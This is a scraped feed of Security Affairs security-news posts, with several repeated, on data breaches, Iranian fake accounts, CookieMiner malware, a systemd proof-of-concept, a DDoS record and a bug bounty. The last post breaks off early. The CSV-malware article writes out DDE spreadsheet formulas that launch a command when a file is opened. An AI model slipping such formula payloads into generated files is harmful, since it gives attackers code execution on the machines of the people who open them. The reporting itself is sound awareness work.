The State Bank of India that left a database containing personal information exposed online.

The discovery was made by an anonymous security researcher that has found a server used for the bank’s Quick service, a mobile-based information service. Quick is “a free service from the Bank where in you can get your Account Balance, Mini Statement and more just by giving a Missed Call or sending an SMS with pre-defined keywords to pre-defined mobile numbers from your registered mobile number.”

The database was exposed online without protection and the database was located could gain access to the plaintext information it contained.

The archive contained millions of text messages, going back to December, that were exchanged by the bank with its customers. Exposed data includes the customer’s phone number, partial bank account number, bank balance and records of transactions.

The good news is that the State Bank of India quickly fixed the issue within hours after it was informed of the problem, unfortunately, it is not known how long the data remained exposed online or whether threat actors accessed to the huge trove of information.

The availability of this information poses a serious risk to bank customers, threat actors could use it to target bank customers.

Pierluigi Paganini

(SecurityAffairs – data breach, State Bank of India)

The post State Bank of India left archive with millions of Customer messages exposed appeared first on Security Affairs.



Security Affairs

State Bank of India left archive with millions of Customer messages exposed

Another data breach made the headlines, this time the victim is the State Bank of India that left a database containing personal information exposed online.

The State Bank of India that left a database containing personal information exposed online.

The discovery was made by an anonymous security researcher that has found a server used for the bank’s Quick service, a mobile-based information service. Quick is “a free service from the Bank where in you can get your Account Balance, Mini Statement and more just by giving a Missed Call or sending an SMS with pre-defined keywords to pre-defined mobile numbers from your registered mobile number.”

The database was exposed online without protection and the database was located could gain access to the plaintext information it contained.

The archive contained millions of text messages, going back to December, that were exchanged by the bank with its customers. Exposed data includes the customer’s phone number, partial bank account number, bank balance and records of transactions.

The good news is that the State Bank of India quickly fixed the issue within hours after it was informed of the problem, unfortunately, it is not known how long the data remained exposed online or whether threat actors accessed to the huge trove of information.

The availability of this information poses a serious risk to bank customers, threat actors could use it to target bank customers.

Pierluigi Paganini

(SecurityAffairs – data breach, State Bank of India)

The post State Bank of India left archive with millions of Customer messages exposed appeared first on Security Affairs.

Facebook dismantled a vast manipulation campaign tied to Iran

Facebook took down hundreds of fake accounts from Iran that were involved in a vast manipulation campaign active in more than 20 countries.

Facebook took down 783 inauthentic accounts, pages and groups from Iran that were involved in a vast manipulation campaign active in more than 20 countries.

“The world’s biggest social network said it removed 783 pages, groups and accounts “for engaging in coordinated inauthentic behavior tied to Iran.“” reported the AFP Press.

Nathaniel Gleicher, head of cybersecurity policy at Facebook, revealed that the pages were promoting Iranian interest in tens of countries, threat actors used fake identities as residents of those nations,

The pages were part of a campaign to promote Iranian interests in various countries by creating fake identities as residents of those nations, according to a statement by Nathaniel Gleicher, head of cybersecurity policy at Facebook.

Iran manipulation campaign Facebook

Facebook continues its efforts to prevent manipulation of its platform for fraudulent activities.

“We are constantly working to detect and stop this type of activity because we don’t want our services to be used to manipulate people,” Gleicher
declared.

“We’re taking down these pages, groups and accounts based on their behavior, not the content they post. In this case, the people behind this activity coordinated with one another and used fake accounts to misrepresent themselves, and that was the basis for our action.”

Threat actors behind the campaign represented themselves as locals and posted news stories on current events. The accounts were used to discuss about topics of interest for Iranians, such as Israel-Palestine relations and the conflicts in Syria and Yemen.

“This morning we removed 783 Pages, groups and accounts for engaging in coordinated inauthentic behavior tied to Iran. There were multiple sets of activity, each localized for a specific country or region, including Afghanistan, Albania, Algeria, Bahrain, Egypt, France, Germany, India, Indonesia, Iran, Iraq, Israel, Libya, Mexico, Morocco, Pakistan, Qatar, Saudi Arabia, Serbia, South Africa, Spain, Sudan, Syria, Tunisia, US, and Yemen.” wrote Nathaniel Gleicher.

“The Page administrators and account owners typically represented themselves as locals, often using fake accounts, and posted news stories on current events. This included commentary that repurposed Iranian state media’s reporting on topics like Israel-Palestine relations and the conflicts in Syria and Yemen, including the role of the US, Saudi Arabia, and Russia.”

In some cases, the activity carried out by the fake accounts date back to 2010.

Facebook pointed out that although threat actors attempted to hide their identities, the manual review of the activities associated with these accounts allowed them to identify the coordinated inauthentic behavior from Iran.

The campaign operated by threat actors as early as 2010 involved 262 pages, 356 accounts, and three groups on Facebook, as well as 162 accounts on Instagram.

According to Facebook, about 2 million accounts followed at least one of the above pages, about 1,600 accounts joined at least one of the groups, and more than 254,000 accounts followed at least one of these Instagram accounts.

The social network giant reported that operators spent less than $30,000 in ads on Facebook and Instagram, they were paid for primarily in US dollars, UK pounds, Canadian dollars, and euros

“We identified some of these accounts through our continued investigation into Iranian coordinated inauthentic behavior we found and removed last year.” concludes Gleicher.

“Our investigation was aided by open source reporting and information provided to us by our industry peers. We have shared information about our investigation with US law enforcement, the US Congress, and policymakers in impacted countries. “

Pierluigi Paganini

(SecurityAffairs – Facebook, manipulation campaign)

The post Facebook dismantled a vast manipulation campaign tied to Iran appeared first on Security Affairs.

Security Affairs: Facebook dismantled a vast manipulation campaign tied to Iran

Facebook took down hundreds of fake accounts from Iran that were involved in a vast manipulation campaign active in more than 20 countries.

Facebook took down 783 inauthentic accounts, pages and groups from Iran that were involved in a vast manipulation campaign active in more than 20 countries.

“The world’s biggest social network said it removed 783 pages, groups and accounts “for engaging in coordinated inauthentic behavior tied to Iran.“” reported the AFP Press.

Nathaniel Gleicher, head of cybersecurity policy at Facebook, revealed that the pages were promoting Iranian interest in tens of countries, threat actors used fake identities as residents of those nations,

The pages were part of a campaign to promote Iranian interests in various countries by creating fake identities as residents of those nations, according to a statement by Nathaniel Gleicher, head of cybersecurity policy at Facebook.

Iran manipulation campaign Facebook

Facebook continues its efforts to prevent manipulation of its platform for fraudulent activities.

“We are constantly working to detect and stop this type of activity because we don’t want our services to be used to manipulate people,” Gleicher
declared.

“We’re taking down these pages, groups and accounts based on their behavior, not the content they post. In this case, the people behind this activity coordinated with one another and used fake accounts to misrepresent themselves, and that was the basis for our action.”

Threat actors behind the campaign represented themselves as locals and posted news stories on current events. The accounts were used to discuss about topics of interest for Iranians, such as Israel-Palestine relations and the conflicts in Syria and Yemen.

“This morning we removed 783 Pages, groups and accounts for engaging in coordinated inauthentic behavior tied to Iran. There were multiple sets of activity, each localized for a specific country or region, including Afghanistan, Albania, Algeria, Bahrain, Egypt, France, Germany, India, Indonesia, Iran, Iraq, Israel, Libya, Mexico, Morocco, Pakistan, Qatar, Saudi Arabia, Serbia, South Africa, Spain, Sudan, Syria, Tunisia, US, and Yemen.” wrote Nathaniel Gleicher.

“The Page administrators and account owners typically represented themselves as locals, often using fake accounts, and posted news stories on current events. This included commentary that repurposed Iranian state media’s reporting on topics like Israel-Palestine relations and the conflicts in Syria and Yemen, including the role of the US, Saudi Arabia, and Russia.”

In some cases, the activity carried out by the fake accounts date back to 2010.

Facebook pointed out that although threat actors attempted to hide their identities, the manual review of the activities associated with these accounts allowed them to identify the coordinated inauthentic behavior from Iran.

The campaign operated by threat actors as early as 2010 involved 262 pages, 356 accounts, and three groups on Facebook, as well as 162 accounts on Instagram.

According to Facebook, about 2 million accounts followed at least one of the above pages, about 1,600 accounts joined at least one of the groups, and more than 254,000 accounts followed at least one of these Instagram accounts.

The social network giant reported that operators spent less than $30,000 in ads on Facebook and Instagram, they were paid for primarily in US dollars, UK pounds, Canadian dollars, and euros

“We identified some of these accounts through our continued investigation into Iranian coordinated inauthentic behavior we found and removed last year.” concludes Gleicher.

“Our investigation was aided by open source reporting and information provided to us by our industry peers. We have shared information about our investigation with US law enforcement, the US Congress, and policymakers in impacted countries. “

Pierluigi Paganini

(SecurityAffairs – Facebook, manipulation campaign)

The post Facebook dismantled a vast manipulation campaign tied to Iran appeared first on Security Affairs.



Security Affairs

Security Affairs: CookieMiner Mac Malware steals browser cookies and sensitive Data

Palo Alto Networks discovered a piece of Mac malware dubbed CookieMiner that is targeting browser cookies associated with cryptocurrency exchanges and wallet service websites..

Researchers from Palo Alto Networks discovered a new piece of Mac malware dubbed CookieMiner that steals browser cookies associated with cryptocurrency exchanges and wallet service websites along with other sensitive data.

The malware targets cookies associated with cryptocurrency exchanges such as Binance, Coinbase, Poloniex, Bittrex, Bitstamp, and MyEtherWallet. It would steal cookies aby website that has “blockchain” in their domain name.
CookieMiner leverages a Python script named “harmlesslittlecode.py.” to steal saved login credentials and credit card information from Chrome.

CookieMiner

CookieMiner is based in the OSX.DarthMiner malware that was discovered by experts at Malwarebytes in December, it is able to steal browser cookies from Chrome and Safari browsers and also sensitive data such as user credentials, in Chrome, saved credit card credentials in Chrome, iPhone text messages from backups and cryptocurrency wallet data and keys.

“This malware is capable of stealing browser cookies associated with mainstream cryptocurrency exchanges and wallet service websites visited by the victims.” reads the analysis published by PaloAlto Networks.

“It also steals saved passwords in Chrome. By leveraging the combination of stolen login credentials, web cookies, and SMS data, based on past attacks like this, we believe the bad actors could bypass multi-factor authentication for these sites. “

Crooks aim to empty the victim’s exchange account or wallet by using a combination of stolen login credentials, web cookies, and SMS data.

Experts believe the threat actors could bypass multifactor authentication for the sites for which they are able to steal associated info.

CookieMiner configures the compromised systems to load coinmining software that appears like an XMRIG-type miner, but that mines Koto, a lesser popular cryptocurrency associated with Japan.

Like DarthMiner, the malware leverages on the EmPyre backdoor as a post-exploitation agent, it checks if the Little Snitch firewall is running on the target host and aborts installation if it does.

“The malware ‘CookieMiner’ is intended to help threat actors generate profit by collecting credential information and mining cryptocurrency. If attackers have all the needed information for the authentication process, the multi-factor authentication may be defeated.” Palo Alto Networks concludes.

“Cryptocurrency owners should keep an eye on their security settings and digital assets to prevent compromise and leakage,”

Further details, including IoCs, are reported in the analysis published by PaloAlto networks.

Pierluigi Paganini

(SecurityAffairs – CookieMiner, cryptocurrency malware)

The post CookieMiner Mac Malware steals browser cookies and sensitive Data appeared first on Security Affairs.



Security Affairs

CookieMiner Mac Malware steals browser cookies and sensitive Data

Palo Alto Networks discovered a piece of Mac malware dubbed CookieMiner that is targeting browser cookies associated with cryptocurrency exchanges and wallet service websites..

Researchers from Palo Alto Networks discovered a new piece of Mac malware dubbed CookieMiner that steals browser cookies associated with cryptocurrency exchanges and wallet service websites along with other sensitive data.

The malware targets cookies associated with cryptocurrency exchanges such as Binance, Coinbase, Poloniex, Bittrex, Bitstamp, and MyEtherWallet. It would steal cookies aby website that has “blockchain” in their domain name.
CookieMiner leverages a Python script named “harmlesslittlecode.py.” to steal saved login credentials and credit card information from Chrome.

CookieMiner

CookieMiner is based in the OSX.DarthMiner malware that was discovered by experts at Malwarebytes in December, it is able to steal browser cookies from Chrome and Safari browsers and also sensitive data such as user credentials, in Chrome, saved credit card credentials in Chrome, iPhone text messages from backups and cryptocurrency wallet data and keys.

“This malware is capable of stealing browser cookies associated with mainstream cryptocurrency exchanges and wallet service websites visited by the victims.” reads the analysis published by PaloAlto Networks.

“It also steals saved passwords in Chrome. By leveraging the combination of stolen login credentials, web cookies, and SMS data, based on past attacks like this, we believe the bad actors could bypass multi-factor authentication for these sites. “

Crooks aim to empty the victim’s exchange account or wallet by using a combination of stolen login credentials, web cookies, and SMS data.

Experts believe the threat actors could bypass multifactor authentication for the sites for which they are able to steal associated info.

CookieMiner configures the compromised systems to load coinmining software that appears like an XMRIG-type miner, but that mines Koto, a lesser popular cryptocurrency associated with Japan.

Like DarthMiner, the malware leverages on the EmPyre backdoor as a post-exploitation agent, it checks if the Little Snitch firewall is running on the target host and aborts installation if it does.

“The malware ‘CookieMiner’ is intended to help threat actors generate profit by collecting credential information and mining cryptocurrency. If attackers have all the needed information for the authentication process, the multi-factor authentication may be defeated.” Palo Alto Networks concludes.

“Cryptocurrency owners should keep an eye on their security settings and digital assets to prevent compromise and leakage,”

Further details, including IoCs, are reported in the analysis published by PaloAlto networks.

Pierluigi Paganini

(SecurityAffairs – CookieMiner, cryptocurrency malware)

The post CookieMiner Mac Malware steals browser cookies and sensitive Data appeared first on Security Affairs.

Airbus data breach exposes some employees’data

The European airplane manufacturer Airbus announced to have suffered a data breach that exposed some employees’ data.

The European airplane manufacturer Airbus announced to have suffered a data breach, hackers broke into the company “Commercial Aircraft business” information systems and gained access to some of its employees’ personal information.

“Airbus SE (stock exchange symbol: AIR)  detected a cyber incident on Airbus “Commercial Aircraft business” information systems, which resulted in unauthorised access to data. There is no impact on Airbus’ commercial operations. “reads the statement published by the company.

airbus logo

According to the European aerospace corporation, the intrusion has happened earlier this month, the good news is that the security breach did not affect its commercial operations either the aircraft production.

The company did not share further details on the hack, it confirmed that investigations are ongoing to “understand if any specific data was targeted,”

However, data accessed by hackers are mostly professional contact and IT identification details of some Airbus employees in Europe.

“Investigations are ongoing to understand if any specific data was targeted; however we do know some personal data was accessed,” continues the statement.

Airbus declared to have begun taking immediate and appropriate actions to reinforce existing security measures. and to mitigate the potential impact of the data breach.

The airplane maker has also instructed its employees to “take all necessary precautions going forward,” to strengthen their security defenses.

The company reported the incident the regulatory authorities and the data protection authorities pursuant to the European Union’s new GDPR (General Data Protection Regulation) rules. It advised its employees to remain vigilant and to take all necessary precautions going forward.

Pierluigi Paganini

(SecurityAffairs – hacking, data breach)

The post Airbus data breach exposes some employees’data appeared first on Security Affairs.

Security Affairs: Airbus data breach exposes some employees’data

The European airplane manufacturer Airbus announced to have suffered a data breach that exposed some employees’ data.

The European airplane manufacturer Airbus announced to have suffered a data breach, hackers broke into the company “Commercial Aircraft business” information systems and gained access to some of its employees’ personal information.

“Airbus SE (stock exchange symbol: AIR)  detected a cyber incident on Airbus “Commercial Aircraft business” information systems, which resulted in unauthorised access to data. There is no impact on Airbus’ commercial operations. “reads the statement published by the company.

airbus logo

According to the European aerospace corporation, the intrusion has happened earlier this month, the good news is that the security breach did not affect its commercial operations either the aircraft production.

The company did not share further details on the hack, it confirmed that investigations are ongoing to “understand if any specific data was targeted,”

However, data accessed by hackers are mostly professional contact and IT identification details of some Airbus employees in Europe.

“Investigations are ongoing to understand if any specific data was targeted; however we do know some personal data was accessed,” continues the statement.

Airbus declared to have begun taking immediate and appropriate actions to reinforce existing security measures. and to mitigate the potential impact of the data breach.

The airplane maker has also instructed its employees to “take all necessary precautions going forward,” to strengthen their security defenses.

The company reported the incident the regulatory authorities and the data protection authorities pursuant to the European Union’s new GDPR (General Data Protection Regulation) rules. It advised its employees to remain vigilant and to take all necessary precautions going forward.

Pierluigi Paganini

(SecurityAffairs – hacking, data breach)

The post Airbus data breach exposes some employees’data appeared first on Security Affairs.



Security Affairs

Security Affairs: Researchers published the PoC exploit code for Linux SystemD bugs

Security researchers at the security firm Capsule8 have published exploit code for the vulnerabilities in Linux systemD disclosed in January.Security researchers at the security firm Capsule8 have published exploit code for the vulnerabilities in Linux systemD disclosed in January.

Early this month, security firm Qualys disclosed three flaws (CVE-2018-16864, CVE-2018-16865, and CVE-2018-16866 ) in a component of systemd, a software suite that provides fundamental building blocks for a Linux operating system used in most major Linux distributions.

The flaws reside in the systemd–journald, a service of the systemd that collects and stores logging data.

Both CVE-2018-16864 and CVE-2018-16865 bugs are memory corruption vulnerabilities, while the CVE-2018-16866 is an out of bounds issue that can lead to an information leak. Qualys experts were working on an exploit for another Linux vulnerability when noticed that passing several megabytes of command-line arguments to a program that calls syslog(), they were able to crash the systemd–journald.

The experts developed a PoC exploit for both CVE-2018-16865 and CVE-2018-16866 that is able to obtain a local root shell in 10 minutes on i386 and 70 minutes on amd64, on average. 

linux systemd

In an attack scenario against a Linux box, the CVE-2018-16864 can be exploited by a malicious code or an ill-intentioned logged-in user, to crash and hijack the systemd–journald system service, and elevated access previleges. The chaining of the CVE-2018-16865 and CVE-2018-16866 could allow a local attacker to crash or hijack the root-privileged journal service.

If you haven’t already applied the patches your system, now you have a good reason to do it because experts at security firm Capsule8 have published exploit code for the flaws.

The exploit code was rendered harmless and shouldn’t work for massive attacks in the wild. However, security experts may devise ways to bypass security protections of Linux installs.

Nick Gregory, security research at Capsule8, published a blog post that revealed that his company has developed a proof-of-concept exploit for the above vulnerabilities.

“As Qualys did not provide exploit code, we developed a proof-of-concept exploit for our own testing and verification.” reads the post published by
Gregory.

“There are some interesting aspects that were not covered by Qualys’ initial publication, such as how to communicate with the affected service to reach the vulnerable component, and how to control the computed hash value that is actually used to corrupt memory,”

The Python exploit script written by the expert targets the 20180808.0.0 release of the ubuntu/bionic64 Vagrant image when the address space layout randomization (ASLR) is disabled (an uncommon condition for production environment).

The script triggers the CVE-2018-16865 flaw via the alloca() function, the expert uses it to allocate a specified number of bytes of memory space in the stack frame of the caller and manipulate the stack pointer.

“Our general approach for exploiting this vulnerability is to initially send the right size and count of entries, so as to make the stack pointer point to libc’s BSS memory region , and then surgically overwrite the free_hook function pointer with a pointer to system.” continues the researcher.

“This grants us arbitrary command execution upon the freeing of memory with content we control.”

The exploitation of the flaws requires controlling all 64 bits of output that the hash function produces, but it is very hard to pre-image that hash.

Even if there are some tools to calculate exact preimages in a few seconds, but for the PoC the experts used a pre-computed hash for the Vagrant image.

To use the same PoC exploit code with other Linux distros it is necessary to calculate the hash, experts at Capsulate8 will details possibility in a follow-up post.

“As the first in our series on this topic, the objective of this post is to provide the reader with the ability to write a proof-of-concept capable of exploiting the service with Address Space Layout Randomization (ASLR) disabled. In the interest of not posting an unreadably-long blog, and also not handing sharp objects to script-kiddies before the community has had chance to patch, we are saving some elements for discussion in future posts in this series, including details on how to control the key computed hash value.” concludes the expert.

“We are also considering providing a full ASLR bypass, but are weighing whether we are lowering the bar too much for the kiddies,”

Pierluigi Paganini

(SecurityAffairs – Linux, systemd )

The post Researchers published the PoC exploit code for Linux SystemD bugs appeared first on Security Affairs.



Security Affairs

Researchers published the PoC exploit code for Linux SystemD bugs

Security researchers at the security firm Capsule8 have published exploit code for the vulnerabilities in Linux systemD disclosed in January.Security researchers at the security firm Capsule8 have published exploit code for the vulnerabilities in Linux systemD disclosed in January.

Early this month, security firm Qualys disclosed three flaws (CVE-2018-16864, CVE-2018-16865, and CVE-2018-16866 ) in a component of systemd, a software suite that provides fundamental building blocks for a Linux operating system used in most major Linux distributions.

The flaws reside in the systemd–journald, a service of the systemd that collects and stores logging data.

Both CVE-2018-16864 and CVE-2018-16865 bugs are memory corruption vulnerabilities, while the CVE-2018-16866 is an out of bounds issue that can lead to an information leak. Qualys experts were working on an exploit for another Linux vulnerability when noticed that passing several megabytes of command-line arguments to a program that calls syslog(), they were able to crash the systemd–journald.

The experts developed a PoC exploit for both CVE-2018-16865 and CVE-2018-16866 that is able to obtain a local root shell in 10 minutes on i386 and 70 minutes on amd64, on average. 

linux systemd

In an attack scenario against a Linux box, the CVE-2018-16864 can be exploited by a malicious code or an ill-intentioned logged-in user, to crash and hijack the systemd–journald system service, and elevated access previleges. The chaining of the CVE-2018-16865 and CVE-2018-16866 could allow a local attacker to crash or hijack the root-privileged journal service.

If you haven’t already applied the patches your system, now you have a good reason to do it because experts at security firm Capsule8 have published exploit code for the flaws.

The exploit code was rendered harmless and shouldn’t work for massive attacks in the wild. However, security experts may devise ways to bypass security protections of Linux installs.

Nick Gregory, security research at Capsule8, published a blog post that revealed that his company has developed a proof-of-concept exploit for the above vulnerabilities.

“As Qualys did not provide exploit code, we developed a proof-of-concept exploit for our own testing and verification.” reads the post published by
Gregory.

“There are some interesting aspects that were not covered by Qualys’ initial publication, such as how to communicate with the affected service to reach the vulnerable component, and how to control the computed hash value that is actually used to corrupt memory,”

The Python exploit script written by the expert targets the 20180808.0.0 release of the ubuntu/bionic64 Vagrant image when the address space layout randomization (ASLR) is disabled (an uncommon condition for production environment).

The script triggers the CVE-2018-16865 flaw via the alloca() function, the expert uses it to allocate a specified number of bytes of memory space in the stack frame of the caller and manipulate the stack pointer.

“Our general approach for exploiting this vulnerability is to initially send the right size and count of entries, so as to make the stack pointer point to libc’s BSS memory region , and then surgically overwrite the free_hook function pointer with a pointer to system.” continues the researcher.

“This grants us arbitrary command execution upon the freeing of memory with content we control.”

The exploitation of the flaws requires controlling all 64 bits of output that the hash function produces, but it is very hard to pre-image that hash.

Even if there are some tools to calculate exact preimages in a few seconds, but for the PoC the experts used a pre-computed hash for the Vagrant image.

To use the same PoC exploit code with other Linux distros it is necessary to calculate the hash, experts at Capsulate8 will details possibility in a follow-up post.

“As the first in our series on this topic, the objective of this post is to provide the reader with the ability to write a proof-of-concept capable of exploiting the service with Address Space Layout Randomization (ASLR) disabled. In the interest of not posting an unreadably-long blog, and also not handing sharp objects to script-kiddies before the community has had chance to patch, we are saving some elements for discussion in future posts in this series, including details on how to control the key computed hash value.” concludes the expert.

“We are also considering providing a full ASLR bypass, but are weighing whether we are lowering the bar too much for the kiddies,”

Pierluigi Paganini

(SecurityAffairs – Linux, systemd )

The post Researchers published the PoC exploit code for Linux SystemD bugs appeared first on Security Affairs.

Exclusive: spreading CSV Malware via Google Sheets

Cyber security expert Marco Ramilli, founder of Yoroi,discovered a way to spread CSV malware via Google Sheets … but Big G says it is an
Intended behavior

A .CSV file could be a malware carrier and if interpreted by Microsoft Excel it could become a malware executor ! When I personally saw this technique back in 2017 (please take a look to herehere and here ) I was fascinated. A simple and sweet textual file forcing the behaviour of powerful and protected machines: no macros, no Visual Basics, no exploit were involved. Indeed if you have ever installed Microsoft Excel on your Windows box you’d probably know when you click on a common .CSV file a MSExcel is turned on. It turns on, it opens the selected .CSV file and interprets cells contents. But what if an attacker writes malicious contents into one or more cells? I personally have never received and/or analysed such a droppers until few days ago when it appeared on my spam-box, it quickly became a mandatory analysis for my personal experience :P.

Dropper .CSV

A series of empty fields preceding a final and fake formula piping a CMD.exe command is spawned. By using the bitsadmin technique the attacker downloads a file called now.exe and stores it into a temporary system folder for later execution. In this specific case the downloaded Malware happens to be a variant of NanoCore RAT, but this is not my point for today. If you are interested in the Malware analysis of now.exeplease read here.

At that time the attacker forced the Dynamic Data Exchange (DDE) protocol for interprocess communication supported by Microsoft ExcelLibreOffice and Apache OpenOffice. For example the following formula on OpenOffice will run calc.exe (CVE-2014-3524).

=DDE("cmd";"/C calc";"__DdeLink_60_870516294")

On Microsoft Excel the same result can be reached by introducing the following formula:

=cmd|' /C calc'!A0

While OpenOffice and LibreOffice patched this vulnerability in the following versions: OpenOffice-4.1.1 (ref here) and LibreOffice-4.3.1 (ref here), Microsoft decided to allow this behaviour by introducing two user “warnings”.

Microsoft Excel User Warnings before letting run DDE content

These warnings recommend that the user shouldn’t click if he does not trust the source of the file…. here we go! What about if you received this file from google spreadsheet? Ok, maybe, none in the cybersecurity community will definitely trust a spreadsheet coming from a random GoogleSheet user, but maybe many people out there would trust GoogleSheet without wondering who really sits behind of the shared document.

Google Sheets spreading .CSV dropper

In 2019 the most interesting thing about this technique is the ability to bypass Google filters. By implementing .csv dropper technique an attacker could easily use Google Sheets as a Malware vector. Although Google implements sophisticated GMail and gDrive anti Malware techniques in order to avoid Malware spreading over its amazing technologies, for example: before uploading or downloading a file from gDrive google scans them (ref: here) or avoiding specific file type (.exe, .dll, .zip, etc etc) over GMail (read more here), this time seems to be not as much as “sensible” to such an issue. Google has been alerted about this issue but it confirmed that it’s actually an “Intended Behaviour”.

Google Ticket Changed on Intended Behaviour

Finally an attacker could send a clear link over an instant message platform and/or over eMail asking to open up a Google Sheets suggesting to the victim to open the spreadsheet locally since “MSExcel compatibility issues”. At that time if the victim downloads the Google sheets and opens up locally (with Microsoft), the attacker might infect her box.

I really hope that Google would -at least try- to avoid to be used as an attack vector as it does with many other technologies, but in the meantime please be aware of this issue and if you receive a link to a not working Google Sheets, please do not download it locally.

Further information, including IoCs, are reported in the blog post published by Marco Ramilli.

Pierluigi Paganini

(SecurityAffairs – Google Sheets, hacking)

The post Exclusive: spreading CSV Malware via Google Sheets appeared first on Security Affairs.

Security Affairs: Imperva mitigated DDoS attack generated 500 Million Packets per Second, the largest ever

Imperva mitigated a SYN flood DDoS attack against one of its clients that exceeded 500 million packets per second, this is the largest ever.

Earlier this month, the cyber security software and services company Imperva mitigated an attack against one of its clients that exceeded 500 million packets per second. This attack was a SYN flood DDoS and it is the largest DDoS attack by packet volume ever observed.

Imperva DDoS attack

The attacker sent both a flood of normal SYN packets and a large SYN flood
using two previously known tools.

The attacker used highly randomized and likely spoofed set of source ports and addresses to send packets of between 800 and 900 bytes.

Normal SYN packets allow to saturate the target resources, while larger packets saturate the network.

According to the experts, the two tools used in the attack were developed by two different individuals, and the attacker combined them in the January attack.

“When we investigated, we realized the attack wasn’t generated using new tools, but two common older ones: one for the syn attack and the other for the large syn attack. Although both tools try to mimic legitimate operating systems, there are some odd, suspicion-raising differences.” reads the report published by Imperva.

“One possible hypothesis is that these tools, although used in the same attack, were written by two different individuals and then combined to form an arsenal and launch the most intensive DDoS attack against Network infrastructure in the history of the Internet. “

Experts pointed out that the most important factor to evaluate the magnitude of a DDoS attack are the Packets per second (PPS).M

The mitigation of DDoS attacks involving very high PPS is very hard because of the computer processing power required to evaluate every single packet.

Network appliances mostly evaluate the headers of every packet and only in a limited number of case they inspect the full payload. Their limiting factor is the packet rate, not the packet size.

Since today, the 2018 GitHub DDoS attack that peaked 1.35 Tbs is considered the largest-ever distributed denial of service. or instance. Its traffic was mainly composed of large packets sent from the same port from different servers at a relatively low PPS rate of around 129.6 million.

The attack observed by Imperva this month was nearly four times in terms of the number of packets being sent from random sources.

The good news is that high PPS attacks are difficult to generate because they require more computational resources.

Pierluigi Paganini

(SecurityAffairs – DDoS, hacking)

The post Imperva mitigated DDoS attack generated 500 Million Packets per Second, the largest ever appeared first on Security Affairs.



Security Affairs

Security Affairs: Skyscanner launches a public bug bounty program

The popular travel search website Skyscanner is going to launch a bug bounty program, the company will pay up to $2,000 per vulnerability.

The travel search website Skyscanner announced a public bug bounty program that will pay up to $2,000 per vulnerability.

Skyscanner has been running a private bug bounty program that according to the company allowed it to discover and address over 200 flaws in its systems. Now Skyscanner is opening the bug bounty program to the public.

“For the past few years, we’ve run a successful private Bug Bounty program, and are excited to announce that we are now extending this to a public program, to further strengthen our security posture, improve our services, and most importantly, to keep our travellers safe when using Skyscanner.” reads the announcement of the bug bounty program published on Bugcrowd.

“We invite researchers to test the Skyscanner website and mobile apps in line with the process and principles set out in this brief.”

Skyscanner

The bug bounty program covers the official skyscanner.net website, regional domains, the gateway.skyscanner.net API, both the iOS and Android apps, and the partnerportal.skyscanner.net website.

The company will pay for vulnerabilities affecting the profile, booking and partner portal sections.

Participants to the bug bounty program cannot access or modify travelers’ data, without explicit prior permission of the owner.

“Only interact with your own accounts or provided test accounts for security research purposes.” continues the announcement.

  • add the following header to all HTTP requests: Skyscanner-Security: Bugcrowd
  • use your username@bugcrowdninja.com email address for accounts
  • not access or modify our, or our travellers’ data, without explicit prior permission of the owner. Only interact with your own accounts or provided test accounts for security research purposes
  • contact us immediately if you inadvertently encounter traveller data. Do not view, alter, save, store, transfer, or otherwise access the data, and immediately purge any local information upon reporting the vulnerability to Skyscanner
  • perform testing and research only within the areas that are in scope
  • follow the Bugcrowd Coordinated Disclosure rules

Researchers risk a 10% penalty if their submission is valid, but the rules haven’t been followed, Skyscanner said.

Skyscanner will pay up rewards up to $1,500/$2,000 per vulnerability such as security misconfigurations, server-side injection issues, broken authentication issues, sensitive data exposure, and cryptography-related bugs.

PRIORITYREWARDFOCUS AREA
P1$1500$2000
P2$900$1200
P3$300$400
P4$100$150

“It is important to note that in some cases a vulnerability priority will be modified due to its likelihood or impact.” Skyscanner added. “In any instance where an issue is downgraded, a full, detailed explanation will be provided to the researcher – along with the opportunity to appeal, and make a case for a higher priority,”

Pierluigi Paganini

(SecurityAffairs – Skyscanner, bug bounty)

The post Skyscanner launches a public bug bounty program appeared first on Security Affairs.



Security Affairs

Skyscanner launches a public bug bounty program

The popular travel search website Skyscanner is going to launch a bug bounty program, the company will pay up to $2,000 per vulnerability.

The travel search website Skyscanner announced a public bug bounty program that will pay up to $2,000 per vulnerability.

Skyscanner has been running a private bug bounty program that according to the company allowed it to discover and address over 200 flaws in its systems. Now Skyscanner is opening the bug bounty program to the public.

“For the past few years, we’ve run a successful private Bug Bounty program, and are excited to announce that we are now extending this to a public program, to further strengthen our security posture, improve our services, and most importantly, to keep our travellers safe when using Skyscanner.” reads the announcement of the bug bounty program published on Bugcrowd.

“We invite researchers to test the Skyscanner website and mobile apps in line with the process and principles set out in this brief.”

Skyscanner

The bug bounty program covers the official skyscanner.net website, regional domains, the gateway.skyscanner.net API, both the iOS and Android apps, and the partnerportal.skyscanner.net website.

The company will pay for vulnerabilities affecting the profile, booking and partner portal sections.

Participants to the bug bounty program cannot access or modify travelers’ data, without explicit prior permission of the owner.

“Only interact with your own accounts or provided test accounts for security research purposes.” continues the announcement.

  • add the following header to all HTTP requests: Skyscanner-Security: Bugcrowd
  • use your username@bugcrowdninja.com email address for accounts
  • not access or modify our, or our travellers’ data, without explicit prior permission of the owner. Only interact with your own accounts or provided test accounts for security research purposes
  • contact us immediately if you inadvertently encounter traveller data. Do not view, alter, save, store, transfer, or otherwise access the data, and immediately purge any local information upon reporting the vulnerability to Skyscanner
  • perform testing and research only within the areas that are in scope
  • follow the Bugcrowd Coordinated Disclosure rules

Researchers risk a 10% penalty if their submission is valid, but the rules haven’t been followed, Skyscanner said.

Skyscanner will pay up rewards up to $1,500/$2,000 per vulnerability such as security misconfigurations, server-side injection issues, broken authentication issues, sensitive data exposure, and cryptography-related bugs.

PRIORITYREWARDFOCUS AREA
P1$1500$2000
P2$900$1200
P3$300$400
P4$100$150

“It is important to note that in some cases a vulnerability priority will be modified due to its likelihood or impact.” Skyscanner added. “In any instance where an issue is downgraded, a full, detailed explanation will be provided to the researcher – along with the opportunity to appeal, and make a case for a higher priority,”

Pierluigi Paganini

(SecurityAffairs – Skyscanner, bug bounty)

The post Skyscanner launches a public bug bounty program appeared first on Security Affairs.

Security Affairs: Facebook paid teens $20 to install a Research App that spies on them

Facebook is paying teens $20 a month to use its VPN app, called Facebook Research, that monitors their activity via their mobile devices.Facebook is paying teens $20 a month to use its VPN app, called Facebook Research, that monitors their activity via the mobile devices.

